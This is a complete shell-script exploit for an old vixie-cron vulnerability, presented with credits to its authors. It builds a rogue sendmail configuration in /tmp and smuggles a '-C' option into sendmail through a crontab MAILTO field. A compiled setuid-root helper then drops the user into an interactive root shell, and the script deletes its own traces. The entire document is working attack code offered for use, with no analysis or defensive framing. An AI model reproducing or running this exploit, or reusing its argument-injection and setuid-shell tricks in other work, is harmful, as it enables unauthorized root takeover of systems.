An exploit for recent vixie-cron vulnerability giving instant root shell
12248c3d35660af5cfc7fca4f9ef8c8c74e5b0e6b5f36893552c05597f51c5b8
#!/bin/sh
clear
echo '------------------------------------------------------------------'
echo 'Marchew Hyperreal Industries <marchew@dione.ids.pl>'
echo 'Stumilowy Las Team <100milowy@gdynia.ids.pl>'
echo '---------------------------- presents ----------------------------'
echo
echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> =-'
echo
echo '[+] Checking dependencies:'
echo -n ' [*] vixie crontab: '
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n ' [*] Berkeley Sendmail: '
if [ -f /usr/sbin/sendmail ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n ' [*] gcc compiler: '
if [ -x /usr/bin/gcc ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo ' [?] Dependiences not verified:'
echo ' [*] proper version of vixie crontab'
echo ' [*] writable /tmp without noexec/nosuid option'
echo '[+] Exploit started.'
echo "[+] Setting up .cf file for sendmail..."
cat >/tmp/vixie-cf <<__eof__
V7/Berkeley
O QueueDirectory=/tmp
O DefaultUser=0:0
R$+ \$#local $: \$1 regular local names
Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=vixie-root
__eof__
echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...'
cat >/tmp/vixie-root <<__eof__
#!/bin/sh
gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__
chmod 755 /tmp/vixie-root
echo '[+] Setting up phase #2 tool (rootshell launcher)...'
cat >/tmp/vixie-own3d.c <<__eof__
main() {
setuid(0);
setgid(0);
unlink("/tmp/vixie-own3d");
execl("/bin/sh","sh","-i",0);
}
__eof__
echo '[+] Putting evil crontab entry...'
crontab - <<__eof__
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
__eof__
echo '[+] Patience is a virtue... Wait up to 60 seconds.'
ILE=0
echo -n '[+] Tick.'
while [ $ILE -lt 50 ]; do
sleep 2
let ILE=ILE+1
test -f /tmp/vixie-own3d && ILE=1000
echo -n '.'
done
echo
echo '[+] Huh, done. Removing crontab entry...'
crontab -r
echo '[+] Removing helper files...'
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null
echo '[*] And now...'
if [ -f /tmp/vixie-own3d ]; then
echo '[+] Entering root shell, babe :)'
echo
/tmp/vixie-own3d
echo
else
echo '[-] Oops, no root shell found, patched system or configuration problem :('
fi
echo '[*] Exploit done.'